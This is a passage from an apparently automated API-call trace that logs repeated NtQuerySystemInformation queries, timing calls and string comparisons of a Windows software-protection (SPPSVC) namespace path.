SystemInformation=0xc751dfce20, Length=0x20, ResultLength=0x0) [0206.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce20, Length=0x20, ResultLength=0x0) [0206.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce20, Length=0x20, ResultLength=0x0) [0206.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd020, Length=0x38, ResultLength=0x0) [0206.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcea0, Length=0x20, ResultLength=0x0) [0206.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce30, Length=0x20, ResultLength=0x0) [0206.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce30, Length=0x20, ResultLength=0x0) [0206.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2b0, Length=0x50, ResultLength=0x0) [0206.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd230, Length=0x28, ResultLength=0x0) [0206.556] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0206.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2b0, Length=0x50, ResultLength=0x0) [0206.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2b0, Length=0x50, ResultLength=0x0) [0206.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2b0, Length=0x50, ResultLength=0x0) [0206.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x38, ResultLength=0x0) [0206.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd010, Length=0x28, ResultLength=0x0) [0206.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd010, Length=0x28, ResultLength=0x0) [0206.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd010, Length=0x28, ResultLength=0x0) [0206.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd080, Length=0x28, ResultLength=0x0) [0206.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x38, ResultLength=0x0) [0206.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x28, ResultLength=0x0) [0206.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x28, ResultLength=0x0) [0206.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x38, ResultLength=0x0) [0206.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd060, Length=0x20, ResultLength=0x0) [0206.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfe0, Length=0x20, ResultLength=0x0) [0206.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfe0, Length=0x20, ResultLength=0x0) [0206.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfe0, Length=0x20, ResultLength=0x0) [0206.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x38, ResultLength=0x0) [0206.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd060, Length=0x20, ResultLength=0x0) [0206.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcff0, Length=0x20, ResultLength=0x0) [0206.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcff0, Length=0x20, ResultLength=0x0) [0206.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2b0, Length=0x50, ResultLength=0x0) [0206.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd230, Length=0x28, ResultLength=0x0) [0206.571] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0206.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2b0, Length=0x50, ResultLength=0x0) [0206.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2b0, Length=0x50, ResultLength=0x0) [0206.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2b0, Length=0x50, ResultLength=0x0) [0206.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x38, ResultLength=0x0) [0206.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd010, Length=0x28, ResultLength=0x0) [0206.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd010, Length=0x28, ResultLength=0x0) [0206.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd010, Length=0x28, ResultLength=0x0) [0206.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd080, Length=0x28, ResultLength=0x0) [0206.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x38, ResultLength=0x0) [0206.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x28, ResultLength=0x0) [0206.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x28, ResultLength=0x0) [0206.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x38, ResultLength=0x0) [0206.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd060, Length=0x20, ResultLength=0x0) [0206.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfe0, Length=0x20, ResultLength=0x0) [0206.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfe0, Length=0x20, ResultLength=0x0) [0206.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfe0, Length=0x20, ResultLength=0x0) [0206.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x38, ResultLength=0x0) [0206.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd060, Length=0x20, ResultLength=0x0) [0206.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcff0, Length=0x20, ResultLength=0x0) [0206.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcff0, Length=0x20, ResultLength=0x0) [0206.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4c8, Length=0x50, ResultLength=0x0) [0206.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd440, Length=0x28, ResultLength=0x0) [0206.585] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0206.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4c8, Length=0x50, ResultLength=0x0) [0206.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4c8, Length=0x50, ResultLength=0x0) [0206.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x50, ResultLength=0x0) [0206.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd330, Length=0x28, ResultLength=0x0) [0206.585] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0206.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x50, ResultLength=0x0) [0206.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x50, ResultLength=0x0) [0206.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x50, ResultLength=0x0) [0206.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2e0, Length=0x38, ResultLength=0x0) [0206.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd110, Length=0x28, ResultLength=0x0) [0206.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd110, Length=0x28, ResultLength=0x0) [0206.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd110, Length=0x28, ResultLength=0x0) [0206.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd180, Length=0x28, ResultLength=0x0) [0206.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2e0, Length=0x38, ResultLength=0x0) [0206.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd200, Length=0x28, ResultLength=0x0) [0206.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd200, Length=0x28, ResultLength=0x0) [0206.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2e0, Length=0x38, ResultLength=0x0) [0206.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd160, Length=0x20, ResultLength=0x0) [0206.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0e0, Length=0x20, ResultLength=0x0) [0206.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0e0, Length=0x20, ResultLength=0x0) [0206.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0e0, Length=0x20, ResultLength=0x0) [0206.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2e0, Length=0x38, ResultLength=0x0) [0206.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd160, Length=0x20, ResultLength=0x0) [0206.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0f0, Length=0x20, ResultLength=0x0) [0206.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0f0, Length=0x20, ResultLength=0x0) [0206.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.598] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc751dfd410 | out: lpSystemTimeAsFileTime=0xc751dfd410*(dwLowDateTime=0xdc6b7ffc, dwHighDateTime=0x1d5fb6e)) [0206.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4c8, Length=0x50, ResultLength=0x0) [0206.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd400, Length=0x28, ResultLength=0x0) [0206.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd318, Length=0x50, ResultLength=0x0) [0206.598] GetTickCount () returned 0x1174578 [0206.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e8, Length=0x58, ResultLength=0x0) [0206.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x38, ResultLength=0x0) [0206.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf30, Length=0x28, ResultLength=0x0) [0206.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf30, Length=0x28, ResultLength=0x0) [0206.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf30, Length=0x28, ResultLength=0x0) [0206.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf30, Length=0x28, ResultLength=0x0) [0206.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfa0, Length=0x28, ResultLength=0x0) [0206.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.601] 